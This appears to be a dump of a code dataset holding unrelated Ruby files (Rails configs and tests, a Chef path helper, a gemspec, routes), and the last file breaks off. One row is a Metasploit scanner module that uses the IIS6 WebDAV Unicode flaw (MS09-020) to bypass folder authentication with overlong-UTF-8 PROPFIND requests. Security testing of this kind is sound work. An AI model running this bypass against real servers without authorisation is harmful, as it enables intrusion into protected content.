hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
bfb086a0d0f319522933d91c01daf7f4e181fb40 | 2,379 | Rails.application.configure do
  # Development-only environment configuration.
  # Settings specified here will take precedence over those in config/application.rb.

  # In the development environment your application's code is reloaded on
  # every request. This slows down response time but is perfect for development
  # since you don't have to restart the web server when you make code changes.
  config.cache_classes = false

  # Do not eager load code on boot.
  config.eager_load = false

  # Show full error reports.
  config.consider_all_requests_local = true

  # Enable/disable caching. By default caching is disabled.
  # Run rails dev:cache to toggle caching.
  if Rails.root.join('tmp', 'caching-dev.txt').exist?
    config.action_controller.perform_caching = true
    config.action_controller.enable_fragment_cache_logging = true

    config.cache_store = :memory_store
    config.public_file_server.headers = {
      'Cache-Control' => "public, max-age=#{2.days.to_i}"
    }
  else
    config.action_controller.perform_caching = false

    config.cache_store = :null_store
  end

  # Store uploaded files on the local file system (see config/storage.yml for options).
  config.active_storage.service = :local

  # Don't care if the mailer can't send.
  config.action_mailer.raise_delivery_errors = false

  config.action_mailer.perform_caching = false

  # Print deprecation notices to the Rails logger.
  config.active_support.deprecation = :log

  # Raise an error on page load if there are pending migrations.
  config.active_record.migration_error = :page_load

  # Highlight code that triggered database queries in logs.
  config.active_record.verbose_query_logs = true

  # Debug mode disables concatenation and preprocessing of assets.
  # This option may cause significant delays in view rendering with a large
  # number of complex assets.
  config.assets.debug = true

  # Suppress logger output for asset requests.
  config.assets.quiet = true

  # Raises error for missing translations.
  # config.action_view.raise_on_missing_translations = true

  # Use an evented file watcher to asynchronously detect changes in source code,
  # routes, locales, etc. This feature depends on the listen gem.
  config.file_watcher = ActiveSupport::EventedFileUpdateChecker

  # Extended Configurations
  # config action mailer
  # Host/port used when mailers generate URLs in development.
  config.action_mailer.default_url_options = { host: 'localhost', port: 3000 }
end
| 34.985294 | 87 | 0.761665 |
require 'test_helper'

# Unit tests for the User model: presence, length, format, uniqueness
# and password validations.
class UserTest < ActiveSupport::TestCase
  def setup
    # NOTE(review): the fixture email addresses in this file had been
    # replaced by "[email protected]" redaction placeholders, which broke the
    # valid/invalid format distinction. Restored to the conventional
    # tutorial values — confirm against the project's history.
    @user = User.new(name: "Example User", email: "user@example.com",
                     password: "foobar", password_confirmation: "foobar")
  end

  test "should be valid" do
    assert @user.valid?
  end

  test "name should be present" do
    @user.name = " "
    assert_not @user.valid?
  end

  test "email should be present" do
    @user.email = " "
    assert_not @user.valid?
  end

  test "name should not be too long" do
    @user.name = "a" * 51
    assert_not @user.valid?
  end

  test "email should not be too long" do
    # 244 + 12 = 256 characters, one past the 255-character limit.
    @user.email = "a" * 244 + "@example.com"
    assert_not @user.valid?
  end

  test "email validation should accept valid addresses" do
    valid_addresses = %w[user@example.com USER@foo.COM A_US-ER@foo.bar.org
                         first.last@foo.jp alice+bob@baz.cn]
    valid_addresses.each do |valid_address|
      @user.email = valid_address
      assert @user.valid?, "#{valid_address.inspect} should be valid"
    end
  end

  test "email validation should reject invalid addresses" do
    invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
                           foo@bar_baz.com foo@bar+baz.com]
    invalid_addresses.each do |invalid_address|
      @user.email = invalid_address
      assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
    end
  end

  test "email addresses should be unique" do
    duplicate_user = @user.dup
    # Uniqueness must be case-insensitive.
    duplicate_user.email = @user.email.upcase
    @user.save
    assert_not duplicate_user.valid?
  end

  test "password should be present (noblank)" do
    # Fix: the original used ""*6, which is still the empty string "", so
    # this test exercised the length validation rather than the blank
    # check. Six spaces are non-empty but blank.
    @user.password = @user.password_confirmation = " " * 6
    assert_not @user.valid?
  end

  test "password should have a minimum length" do
    @user.password = @user.password_confirmation = "a" * 5
    assert_not @user.valid?
  end
end
03046945162b06833d7a354cc0fe5a4ceb6be9bb | 10,917 | #
# Author:: Bryan McLellan <[email protected]>
# Copyright:: Copyright 2014-2016, Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "chef-config/windows"
require "chef-config/logger"
require "chef-config/exceptions"
module ChefConfig
  # Cross-platform path manipulation helpers. On Windows both "/" and "\"
  # are honored as separators and the \\?\ long-path prefix is handled.
  class PathHelper
    # Maximum characters in a standard Windows path (260 including drive letter and NUL)
    WIN_MAX_PATH = 259

    # Returns the directory portion of +path+. On Windows both separator
    # styles are honored; elsewhere this defers to File.dirname.
    def self.dirname(path)
      if ChefConfig.windows?
        # Find the first slash, not counting trailing slashes
        end_slash = path.size
        loop do
          slash = path.rindex(/[#{Regexp.escape(File::SEPARATOR)}#{Regexp.escape(path_separator)}]/, end_slash - 1)
          if !slash
            return end_slash == path.size ? "." : path_separator
          elsif slash == end_slash - 1
            end_slash = slash
          else
            return path[0..slash - 1]
          end
        end
      else
        ::File.dirname(path)
      end
    end

    BACKSLASH = '\\'.freeze

    # Platform path separator: backslash on Windows, File::SEPARATOR elsewhere.
    def self.path_separator
      if ChefConfig.windows?
        File::ALT_SEPARATOR || BACKSLASH
      else
        File::SEPARATOR
      end
    end

    # Joins the components with the platform separator, collapsing redundant
    # leading/trailing separators between adjacent components.
    def self.join(*args)
      path_separator_regex = Regexp.escape(File::SEPARATOR)
      unless path_separator == File::SEPARATOR
        path_separator_regex << Regexp.escape(path_separator)
      end

      trailing_slashes = /[#{path_separator_regex}]+$/
      leading_slashes = /^[#{path_separator_regex}]+/

      args.flatten.inject() do |joined_path, component|
        joined_path = joined_path.sub(trailing_slashes, "")
        component = component.sub(leading_slashes, "")
        joined_path + "#{path_separator}#{component}"
      end
    end

    # On Windows, rejects paths containing non-printable characters and
    # prefixes over-long paths with \\?\. Returns the (possibly modified) path.
    # Raises ChefConfig::InvalidPath for non-printable paths.
    def self.validate_path(path)
      if ChefConfig.windows?
        unless printable?(path)
          msg = "Path '#{path}' contains non-printable characters. Check that backslashes are escaped with another backslash (e.g. C:\\\\Windows) in double-quoted strings."
          ChefConfig.logger.error(msg)
          raise ChefConfig::InvalidPath, msg
        end

        if windows_max_length_exceeded?(path)
          ChefConfig.logger.debug("Path '#{path}' is longer than #{WIN_MAX_PATH}, prefixing with'\\\\?\\'")
          path.insert(0, "\\\\?\\")
        end
      end

      path
    end

    def self.windows_max_length_exceeded?(path)
      # Check to see if paths without the \\?\ prefix are over the maximum allowed length for the Windows API
      # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247%28v=vs.85%29.aspx
      unless path =~ /^\\\\?\\/
        if path.length > WIN_MAX_PATH
          return true
        end
      end

      false
    end

    def self.printable?(string)
      # returns true if string is free of non-printable characters (escape sequences)
      # this returns false for whitespace escape sequences as well, e.g. \n\t
      if string =~ /[^[:print:]]/
        false
      else
        true
      end
    end

    # Produces a comparable path.
    def self.canonical_path(path, add_prefix = true)
      # First remove extra separators and resolve any relative paths
      abs_path = File.absolute_path(path)

      if ChefConfig.windows?
        # Add the \\?\ API prefix on Windows unless add_prefix is false
        # Downcase on Windows where paths are still case-insensitive
        abs_path.gsub!(::File::SEPARATOR, path_separator)
        if add_prefix && abs_path !~ /^\\\\?\\/
          abs_path.insert(0, "\\\\?\\")
        end

        abs_path.downcase!
      end

      abs_path
    end

    # This is the INVERSE of Pathname#cleanpath, it converts forward
    # slashes to backwhacks for Windows. Since the Ruby API and the
    # Windows APIs all consume forward slashes, this helper function
    # should only be used for *DISPLAY* logic to send strings back
    # to the user with backwhacks. Internally, filename paths should
    # generally be stored with forward slashes for consistency. It is
    # not necessary or desired to blindly convert pathnames to have
    # backwhacks on Windows.
    #
    # Generally, if the user isn't going to be seeing it, you should be
    # using Pathname#cleanpath intead of this function.
    def self.cleanpath(path)
      path = Pathname.new(path).cleanpath.to_s
      # ensure all forward slashes are backslashes
      if ChefConfig.windows?
        path = path.gsub(File::SEPARATOR, path_separator)
      end
      path
    end

    def self.paths_eql?(path1, path2)
      canonical_path(path1) == canonical_path(path2)
    end

    # Note: this method is deprecated. Please use escape_glob_dirs
    # Paths which may contain glob-reserved characters need
    # to be escaped before globbing can be done.
    # http://stackoverflow.com/questions/14127343
    def self.escape_glob(*parts)
      path = cleanpath(join(*parts))
      path.gsub(/[\\\{\}\[\]\*\?]/) { |x| "\\" + x }
    end

    # This function does not switch to backslashes for windows
    # This is because only forwardslashes should be used with dir (even for windows)
    def self.escape_glob_dir(*parts)
      path = Pathname.new(join(*parts)).cleanpath.to_s
      path.gsub(/[\\\{\}\[\]\*\?]/) { |x| "\\" + x }
    end

    def self.relative_path_from(from, to)
      Pathname.new(cleanpath(to)).relative_path_from(Pathname.new(cleanpath(from)))
    end

    # Retrieves the "home directory" of the current user while trying to ascertain the existence
    # of said directory. The path returned uses / for all separators (the ruby standard format).
    # If the home directory doesn't exist or an error is otherwise encountered, nil is returned.
    #
    # If a set of path elements is provided, they are appended as-is to the home path if the
    # homepath exists.
    #
    # If an optional block is provided, the joined path is passed to that block if the home path is
    # valid and the result of the block is returned instead.
    #
    # Home-path discovery is performed once. If a path is discovered, that value is memoized so
    # that subsequent calls to home_dir don't bounce around.
    #
    # See self.all_homes.
    def self.home(*args)
      @@home_dir ||= self.all_homes { |p| break p }
      if @@home_dir
        path = File.join(@@home_dir, *args)
        block_given? ? (yield path) : path
      end
    end

    # See self.home. This method performs a similar operation except that it yields all the different
    # possible values of 'HOME' that one could have on this platform. Hence, on windows, if
    # HOMEDRIVE\HOMEPATH and USERPROFILE are different, the provided block will be called twice.
    # This method goes out and checks the existence of each location at the time of the call.
    #
    # The return is a list of all the returned values from each block invocation or a list of paths
    # if no block is provided.
    def self.all_homes(*args)
      paths = []
      if ChefConfig.windows?
        # By default, Ruby uses the the following environment variables to determine Dir.home:
        # HOME
        # HOMEDRIVE HOMEPATH
        # USERPROFILE
        # Ruby only checks to see if the variable is specified - not if the directory actually exists.
        # On Windows, HOMEDRIVE HOMEPATH can point to a different location (such as an unavailable network mounted drive)
        # while USERPROFILE points to the location where the user application settings and profile are stored.  HOME
        # is not defined as an environment variable (usually). If the home path actually uses UNC, then the prefix is
        # HOMESHARE instead of HOMEDRIVE.
        #
        # We instead walk down the following and only include paths that actually exist.
        # HOME
        # HOMEDRIVE HOMEPATH
        # HOMESHARE HOMEPATH
        # USERPROFILE
        paths << ENV["HOME"]
        paths << ENV["HOMEDRIVE"] + ENV["HOMEPATH"] if ENV["HOMEDRIVE"] && ENV["HOMEPATH"]
        paths << ENV["HOMESHARE"] + ENV["HOMEPATH"] if ENV["HOMESHARE"] && ENV["HOMEPATH"]
        paths << ENV["USERPROFILE"]
      end
      paths << Dir.home if ENV["HOME"]

      # Depending on what environment variables we're using, the slashes can go in any which way.
      # Just change them all to / to keep things consistent.
      # Note: Maybe this is a bad idea on some unixy systems where \ might be a valid character depending on
      # the particular brand of kool-aid you consume.  This code assumes that \ and / are both
      # path separators on any system being used.
      paths = paths.map { |home_path| home_path.gsub(path_separator, ::File::SEPARATOR) if home_path }

      # Filter out duplicate paths and paths that don't exist.
      # Fix: Dir.exists? was deprecated in Ruby 2.1 and removed in Ruby 3.2;
      # Dir.exist? is the supported spelling.
      valid_paths = paths.select { |home_path| home_path && Dir.exist?(home_path.force_encoding("utf-8")) }
      valid_paths = valid_paths.uniq

      # Join all optional path elements at the end.
      # If a block is provided, invoke it - otherwise just return what we've got.
      joined_paths = valid_paths.map { |home_path| File.join(home_path, *args) }
      if block_given?
        joined_paths.each { |p| yield p }
      else
        joined_paths
      end
    end

    # Determine if the given path is protected by OS X System Integrity Protection.
    def self.is_sip_path?(path, node)
      if node["platform"] == "mac_os_x" && Gem::Version.new(node["platform_version"]) >= Gem::Version.new("10.11")
        # todo: parse rootless.conf for this?
        sip_paths = [
          "/System", "/bin", "/sbin", "/usr"
        ]
        sip_paths.each do |sip_path|
          ChefConfig.logger.info("This is a SIP path, checking if it in exceptions list.")
          return true if path.start_with?(sip_path)
        end
        false
      else
        false
      end
    end

    # Determine if the given path is on the exception list for OS X System Integrity Protection.
    def self.writable_sip_path?(path)
      # todo: parse rootless.conf for this?
      sip_exceptions = [
        "/System/Library/Caches", "/System/Library/Extensions",
        "/System/Library/Speech", "/System/Library/User Template",
        "/usr/libexec/cups", "/usr/local", "/usr/share/man"
      ]
      sip_exceptions.each do |exception_path|
        return true if path.start_with?(exception_path)
      end
      ChefConfig.logger.error("Cannot write to a SIP Path on OS X 10.11+")
      false
    end
  end
end
| 38.440141 | 172 | 0.654942 |
62996e29494ce567b4b6f24cbf59abb8b824435f | 224 | class ApplicationMailer < ActionMailer::Base
  # Base class for all application mailers.
  # NOTE(review): both addresses below look like redacted placeholders
  # ("[email protected]") — confirm the real values before relying on them.
  MILIEU_EMAIL_ADDRESS = '[email protected]'.freeze
  NOTIFICATION_EMAIL_ADDRESS = '[email protected]'.freeze

  # All outgoing mail defaults to the notification sender address and is
  # rendered with the 'mailer' layout.
  default from: NOTIFICATION_EMAIL_ADDRESS
  layout 'mailer'
end
| 28 | 63 | 0.808036 |
fffede2acd198f8d16b3b24d36924ec87cf9a084 | 115 | # frozen_string_literal: true

# Test bootstrap: coverage is required first — presumably so it can
# instrument the requires that follow (verify against support/coverage).
require 'support/coverage'
require 'env_mock'
# Interactive debugger available inside specs.
require 'pry-byebug'
require 'rspec'
| 14.375 | 29 | 0.782609 |
1866be705cb79d2779b28a8c63327904d38debf3 | 203 | class CreateEvents < ActiveRecord::Migration[5.2]
  # Creates the events table: an event name plus its distance and stroke
  # (presumably swim races, judging by "stroke" — confirm), with the
  # standard created_at/updated_at timestamp columns.
  def change
    create_table :events do |t|
      t.string :name
      t.integer :distance
      t.string :stroke

      t.timestamps
    end
  end
end
| 16.916667 | 49 | 0.640394 |
01b7c5e0948da1c975a6fe5f85422d310b5b4f0a | 690 | # -*- encoding: utf-8 -*-
# Gem specification for fb_rails, a Rails 3 client for the Facebook API.
Gem::Specification.new do |s|
  s.name = 'fb_rails'
  s.version = '1.2.0'
  s.summary = 'Facebook on Rails'
  s.description = 'A Rails 3 gem for the latest facebook API'

  # Minimum toolchain requirements.
  s.required_ruby_version = '>= 1.9.2'
  s.required_rubygems_version = '>= 1.3.5'

  # NOTE(review): the author email looks like a redacted placeholder — confirm.
  s.author = 'Matthew Higgins'
  s.email = '[email protected]'
  s.homepage = 'http://github.com/matthuhiggins/fb_rails'

  # Packaged files: license/build/docs plus all lib and test sources.
  s.extra_rdoc_files = ['README.rdoc']
  s.files = %w(MIT-LICENSE Rakefile README.rdoc) + Dir['{lib,test}/**/*.rb']
  s.require_path = 'lib'

  # Development-only dependencies; not installed by gem consumers.
  s.add_development_dependency('rails', '>= 3.0.0')
  s.add_development_dependency('fakeweb')
end
| 31.363636 | 76 | 0.634783 |
8727e4dda14756e975774b36069f2d47c021ddfb | 533 | platform_is :windows do
  require 'win32ole'

  # Specs for WIN32OLE_METHOD#invkind, which reports the OLE invoke kind
  # of a method. The expected value 2 below is what the Scripting
  # Runtime's File.name member reports — NOTE(review): confirm against
  # the type library (2 conventionally denotes a property getter).
  describe 'WIN32OLE_METHOD#invkind' do
    before :each do
      # Look up the "name" member on the Scripting Runtime's File class.
      ole_type = WIN32OLE_TYPE.new("Microsoft Scripting Runtime", "File")
      @m_file_name = WIN32OLE_METHOD.new(ole_type, "name")
    end

    it 'raises ArgumentError if argument is given' do
      lambda { @m_file_name.invkind(1) }.should raise_error ArgumentError
    end

    it 'returns expected value for Scripting Runtime\'s "name" method' do
      @m_file_name.invkind.should == 2
    end
  end
end | 26.65 | 73 | 0.679174 |
f710262eab160b54d2fe9f3fa167b8a9656d8c78 | 5,606 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::WmapScanDir
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner',
      'Description' => %q{
This module is based on et's HTTP Directory Scanner module,
with one exception. Where authentication is required, it attempts
to bypass authentication using the WebDAV IIS6 Unicode vulnerability
discovered by Kingcope. The vulnerability appears to be exploitable
where WebDAV is enabled on the IIS6 server, and any protected folder
requires either Basic, Digest or NTLM authentication.
},
      'Author' => [ 'patrick' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'MSB', 'MS09-020' ],
          [ 'CVE', '2009-1535' ],
          [ 'CVE', '2009-1122' ],
          [ 'OSVDB', '54555' ],
          [ 'BID', '34993' ],
        ]))

    register_options(
      [
        OptString.new('PATH', [ true, "The path to identify files", '/']),
        OptInt.new('ERROR_CODE', [ true, "Error code for non existent directory", 404]),
        OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
            File.join(Msf::Config.install_root, "data", "wmap", "wmap_dirs.txt")
          ]
        ),
        OptPath.new('HTTP404S', [ false, "Path of 404 signatures to use",
            File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
          ]
        )
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
      ], self.class)
  end

  # Per-host scan: first fingerprints the server's "not found" response
  # (status code or body signature), then PROPFINDs every dictionary
  # directory. On a 401 it retries the same directory prefixed with an
  # overlong-UTF-8-encoded random segment to test the MS09-020 bypass;
  # a 207 (Multi-Status) reply on the retry is reported as vulnerable.
  def run_host(ip)
    conn = true
    ecode = nil
    emesg = nil

    tpath = normalize_uri(datastore['PATH'])
    if tpath[-1,1] != '/'
      tpath += '/'
    end

    ecode = datastore['ERROR_CODE'].to_i
    vhost = datastore['VHOST'] || wmap_target_host
    prot = datastore['SSL'] ? 'https' : 'http'

    #
    # Detect error code
    #
    begin
      # Request a random (almost certainly absent) directory to learn what
      # this server returns for missing resources.
      randdir = Rex::Text.rand_text_alpha(5).chomp + '/'
      res = send_request_cgi({
        'uri' => tpath+randdir,
        'method' => 'GET',
        'ctype' => 'text/html'
      }, 20)

      return if not res

      tcode = res.code.to_i

      # Look for a string we can signature on as well
      if(tcode >= 200 and tcode <= 299)
        File.open(datastore['HTTP404S'], 'rb').each do |str|
          if(res.body.index(str))
            emesg = str
            break
          end
        end

        if(not emesg)
          print_status("Using first 256 bytes of the response as 404 string")
          emesg = res.body[0,256]
        else
          print_status("Using custom 404 string of '#{emesg}'")
        end
      else
        ecode = tcode
        print_status("Using code '#{ecode}' as not found.")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      conn = false
    rescue ::Timeout::Error, ::Errno::EPIPE
    end

    return if not conn

    # Minimal PROPFIND body asking for common DAV properties.
    webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
      '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
      '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'

    File.open(datastore['DICTIONARY'], 'rb').each do |testf|
      begin
        testfdir = testf.chomp + '/'
        res = send_request_cgi({
          'uri' => tpath + testfdir,
          'method' => 'PROPFIND',
          'ctype' => 'application/xml',
          'headers' =>
            {
            },
          'data' => webdav_req + "\r\n\r\n",
        }, 20)

        # NOTE(review): when res is nil this branch is taken, yet the
        # message below interpolates res.code — that would raise
        # NoMethodError on nil. Confirm and guard upstream.
        if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
          if !datastore['NoDetailMessages']
            print_status("NOT Found #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
          end
        elsif (res.code.to_i == 401)
          print_status("Found protected folder #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
          print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")

          # Build a short random segment of URL-unfriendly characters, then
          # overlong-UTF-8 encode it (Rex 'overlong', width 2) so IIS6
          # mis-normalizes the path and skips the auth check.
          cset = %W{ & ^ % $ # @ ! }
          buff = ''
          blen = rand(16)+1
          while(buff.length < blen)
            buff << cset[ rand(cset.length) ]
          end
          bogus = Rex::Text.uri_encode(Rex::Text.to_unicode( buff, 'utf-8', 'overlong', 2))

          res = send_request_cgi({
            'uri' => tpath + bogus + testfdir,
            'method' => 'PROPFIND',
            'ctype' => 'application/xml',
            'headers' =>
              {
                #'Translate' => 'f', # Not required in PROPFIND, only GET - patrickw 20091518
              },
            'data' => webdav_req + "\r\n\r\n",
          }, 20)

          if (res.code.to_i == 207)
            print_status("\tFound vulnerable WebDAV Unicode bypass target #{wmap_base_url}#{tpath}%c0%af#{testfdir} #{res.code} (#{wmap_target_host})")

            # Unable to use report_web_vuln as method is PROPFIND and is not part of allowed
            # list in db.rb
            report_note(
              :host => ip,
              :proto => 'tcp',
              :sname => (ssl ? 'https' : 'http'),
              :port => rport,
              :type => 'UNICODE_WEBDAV_BYPASS',
              :data => "#{tpath}%c0%af#{testfdir} Code: #{res.code}",
              :update => :unique_data
            )
          end
        end
      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      rescue ::Timeout::Error, ::Errno::EPIPE
      end
    end
  end
end
| 29.046632 | 145 | 0.61345 |
ff74f4a60a087da3c2321c5d5daf50ba28e07510 | 288 | Rails.application.routes.draw do
  # Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html

  # Actors are read-only here: only the index action is exposed.
  resources :actors, only: [:index]

  # Defines the root path route ("/")
  root "actors#index"

  # Mount Sidekiq's web UI at /sidekiq for inspecting background jobs.
  # NOTE(review): no authentication constraint is visible here — confirm
  # the dashboard is protected before exposing it in production.
  require 'sidekiq/web'
  mount Sidekiq::Web => '/sidekiq'
end
| 26.181818 | 93 | 0.715278 |
f8458ade71cc471d25aafd158dc60bf584f7eb8e | 1,877 | class SubjectsController < ApplicationController
  # Standard scaffold CRUD for Subject records; every action responds to
  # both HTML and JSON.
  before_action :set_subject, only: [:show, :edit, :update, :destroy]

  # GET /subjects
  # GET /subjects.json
  def index
    @subjects = Subject.all
  end

  # GET /subjects/1
  # GET /subjects/1.json
  def show
  end

  # GET /subjects/new
  def new
    @subject = Subject.new
  end

  # GET /subjects/1/edit
  def edit
  end

  # POST /subjects
  # POST /subjects.json
  def create
    @subject = Subject.new(subject_params)

    respond_to do |format|
      if @subject.save
        format.html { redirect_to @subject, notice: 'Subject was successfully created.' }
        format.json { render :show, status: :created, location: @subject }
      else
        format.html { render :new }
        format.json { render json: @subject.errors, status: :unprocessable_entity }
      end
    end
  end

  # PATCH/PUT /subjects/1
  # PATCH/PUT /subjects/1.json
  def update
    respond_to do |format|
      if @subject.update(subject_params)
        format.html { redirect_to @subject, notice: 'Subject was successfully updated.' }
        format.json { render :show, status: :ok, location: @subject }
      else
        format.html { render :edit }
        format.json { render json: @subject.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /subjects/1
  # DELETE /subjects/1.json
  def destroy
    @subject.destroy
    respond_to do |format|
      format.html { redirect_to subjects_url, notice: 'Subject was successfully destroyed.' }
      format.json { head :no_content }
    end
  end

  private

  # Use callbacks to share common setup or constraints between actions.
  def set_subject
    @subject = Subject.find(params[:id])
  end

  # Never trust parameters from the scary internet, only allow the white list through.
  # Only :name is currently permitted.
  def subject_params
    params.require(:subject).permit(:name)
  end
end
| 24.697368 | 93 | 0.665424 |
261e4e1a51f16e1452feb8b4481278cbd3469aee | 139 | require File.expand_path('../../../spec_helper', __FILE__)

# Placeholder spec: Date#cweek has a pending example and no assertions yet.
describe "Date#cweek" do
  it "needs to be reviewed for spec completeness"
end
| 23.166667 | 58 | 0.726619 |
# Test-only routing table exercising every Sorcery feature area: core
# login/logout, remember-me, session invalidation, each external OAuth
# provider, return-to handling, and HTTP basic auth.
AppRoot::Application.routes.draw do
  root to: 'application#index'

  controller :sorcery do
    get :test_login
    get :test_logout
    get :some_action
    post :test_return_to
    get :test_auto_login
    post :test_login_with_remember_in_login
    get :test_login_from_cookie
    # Fix: this route was declared twice (and a stray early duplicate of
    # :test_return_to_with_external existed); each route now appears once.
    get :test_login_from
    get :test_logout_with_remember
    get :test_logout_with_force_forget_me
    get :test_invalidate_active_session
    get :test_should_be_logged_in
    get :test_create_from_provider
    get :test_add_second_provider

    # Provider-specific login callbacks.
    get :test_login_from_twitter
    get :test_login_from_facebook
    get :test_login_from_github
    get :test_login_from_paypal
    get :test_login_from_wechat
    get :test_login_from_microsoft
    get :test_login_from_google
    get :test_login_from_liveid
    get :test_login_from_vk
    get :test_login_from_jira
    get :test_login_from_salesforce
    get :test_login_from_slack
    get :test_login_from_instagram
    get :test_login_from_auth0

    # Provider-specific login_at entry points.
    get :login_at_test
    get :login_at_test_twitter
    get :login_at_test_facebook
    get :login_at_test_github
    get :login_at_test_paypal
    get :login_at_test_wechat
    get :login_at_test_microsoft
    get :login_at_test_google
    get :login_at_test_liveid
    get :login_at_test_vk
    get :login_at_test_jira
    get :login_at_test_salesforce
    get :login_at_test_slack
    get :login_at_test_instagram
    get :login_at_test_auth0

    # Return-to handling after external authentication.
    get :test_return_to_with_external
    get :test_return_to_with_external_twitter
    get :test_return_to_with_external_facebook
    get :test_return_to_with_external_github
    get :test_return_to_with_external_paypal
    get :test_return_to_with_external_wechat
    get :test_return_to_with_external_microsoft
    get :test_return_to_with_external_google
    get :test_return_to_with_external_liveid
    get :test_return_to_with_external_vk
    get :test_return_to_with_external_jira
    get :test_return_to_with_external_salesforce
    get :test_return_to_with_external_slack
    get :test_return_to_with_external_instagram
    get :test_return_to_with_external_auth0

    get :test_http_basic_auth
    get :some_action_making_a_non_persisted_change_to_the_user
    post :test_login_with_remember
    get :test_create_from_provider_with_block
    get :login_at_test_with_state
  end
end
| 33.069444 | 62 | 0.797984 |
38413c5742e081ec35db3f3239a1067fd1544fe6 | 1,188 | require_relative '../ports/identity_port'
module Existence
  module Adapters
    # Shared base class for identity-service adapters: wraps a port,
    # converts port results into Either values, and provides auth-header
    # helpers for subclasses.
    class AdapterBase
      include Dry::Monads::Either::Mixin

      # Port responses with this status are treated as successes.
      SUCCESS_STATUS = :ok

      attr_reader :port

      # port:   object used to talk to the identity service
      # config: configuration holder; its #config is captured locally
      def initialize(port: Ports::IdentityPort, config: Configuration, **) #oauth_token_value: Domain::OauthTokenValue
        @port = port
        @config = config.config
        # @oauth_token_value = oauth_token_value
      end

      private

      # Wraps a port result: Left on failure or non-:ok status, otherwise
      # Right of the (possibly transformed, see #value) response body.
      def result(result)
        return Left(result.value) if result.failure? || failure_status(result.value.status)
        Right(value(result.value.body))
      end

      # overridden by adapters that wish to return a non-port value.
      def value(result)
        result
      end

      # Formats a JWT as an HTTP Bearer authorization header value.
      def bearer_token(jwt)
        "Bearer #{jwt}"
      end

      def failure_status(status)
        status != SUCCESS_STATUS
      end

      # Builds a Basic-auth token from a hash holding :client_id/:client_secret.
      def basic_auth_token(credentials)
        basic_credentials(credentials[:client_id], credentials[:client_secret])
      end

      # Strict (no-newline) Base64 of "user:secret", as used in Basic auth.
      def basic_credentials(user, secret)
        Base64.strict_encode64("#{user}:#{secret}")
      end

      def service
        @config.identity_host
      end
    end
  end
end
| 20.135593 | 118 | 0.635522 |
ab04e0da6f95e8b80922441fbfac7f0c1bb8dc8b | 1,592 | # Puzzle: http://adventofcode.com/2017/day/3
# --- Day 3: Spiral Memory ---
#
# You come across an experimental new kind of memory stored on an infinite
# two-dimensional grid.
#
# Each square on the grid is allocated in a spiral pattern starting at a
# location marked 1 and then counting up while spiraling outward. For example,
# the first few squares are allocated like this:
#
# 17 16 15 14 13
# 18 5 4 3 12
# 19 6 1 2 11
# 20 7 8 9 10
# 21 22 23---> ...
#
# While this is very space-efficient (no squares are skipped), requested data
# must be carried back to square 1 (the location of the only access port for
# this memory system) by programs that can only move up, down, left, or right.
# They always take the shortest path: the Manhattan Distance
# <https://en.wikipedia.org/wiki/Taxicab_geometry> between the location of the
# data and square 1.
#
# For example:
#
# - Data from square 1 is carried 0 steps, since it's at the access port.
# - Data from square 12 is carried 3 steps, such as: down, left, left.
# - Data from square 23 is carried only 2 steps: up twice.
# - Data from square 1024 must be carried 31 steps.
#
# How many steps are required to carry the data from the square identified in
# your puzzle input all the way to the access port?
#
# Your puzzle input is 289326.
input = 289326

# Side length of the smallest odd-sided spiral "ring" that encloses the
# input square: round the square root up, then bump even results to the
# next odd number (ring sides are always odd: 1, 3, 5, ...).
next_whole_square_root = Math.sqrt(input).ceil
next_odd_square_root =
  if next_whole_square_root.even?
    next_whole_square_root + 1
  else
    next_whole_square_root
  end
| 37.023256 | 80 | 0.675251 |
f712644835e14291a1817f4581280c23cab67294 | 969 | require 'ethereum-contract-abi/encoders/decimal_encoder'
require 'ethereum-contract-abi/util'

include EthereumContractABI::Encoders

# Specs for DecimalEncoder: fixed-point values are scaled by the given
# precision (69.69 with 2 digits -> 6969 == 0x1B39) and encoded into a
# single 32-byte word; negative values use two's complement
# (0x...FFE4C7 == -6969).
describe EthereumContractABI::Encoders::DecimalEncoder do
  describe "encode" do
    it "encodes basic decimal number with 2 digits of precision" do
